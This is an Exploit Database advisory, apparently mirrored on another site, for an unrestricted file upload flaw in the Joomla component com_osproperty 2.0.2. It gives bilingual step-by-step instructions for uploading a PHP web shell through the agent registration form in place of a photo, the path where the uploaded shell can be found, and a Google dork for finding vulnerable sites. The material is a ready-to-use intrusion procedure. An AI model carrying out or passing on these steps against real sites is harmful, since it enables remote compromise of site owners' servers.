Joomla! Component com_osproperty 2.0.2 – Unrestricted Arbitrary File Upload

• Exploit Database
• 15 阅读

• 作者： D4NB4R
  日期： 2012-07-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/19829/

• _______________________________________________________________________________________
   
   Exploit Title: Joomla com_osproperty Unrestricted File Upload 
  
   Google Dork: com_osproperty
  
   Date: [13-07-2012]
  
   Author: Daniel Barragan "D4NB4R"
  
   Twitter: @D4NB4R
  
   site: http://www.insecurityperu.org/&http://poisonsecurity.wordpress.com/
  
   Vendor: Ossolution Team http://extensions.joomla.org/
  
   Version: 2.0.2 (last update on Jul 12, 2012)
  
   License: Commercial $ 28.86us
   
   Tested on: [Linux(arch)-Windows(7ultimate)]
  
  
  1.Go to this route
  Ingrese a esta ruta
   
   http://site/component/osproperty/?task=agent_register
  
  
  2.Complete the form, raising the shell.php instead of your photo
  Complete el formulario, subiendo la shell.php en lugar de su foto
  
  
  3.Locate your file in the root /osproperty/agent/ 
  Busque su archivo en la raiz /osproperty/agent/ 
   
  http://site/images/osproperty/agent/randomid_yourshell.php
  
  
  Help:This path can help you find your web shell in case you need it
   Este path le puede ayudar a encontrar su web shell en caso q lo necesite
  
   component/osproperty/?task=agent_default
   
  
  Im not responsible for which is given
  No me hago responsable del uso que se le de
  _______________________________________________________________________________________
  Daniel Barragan "D4NB4R"2012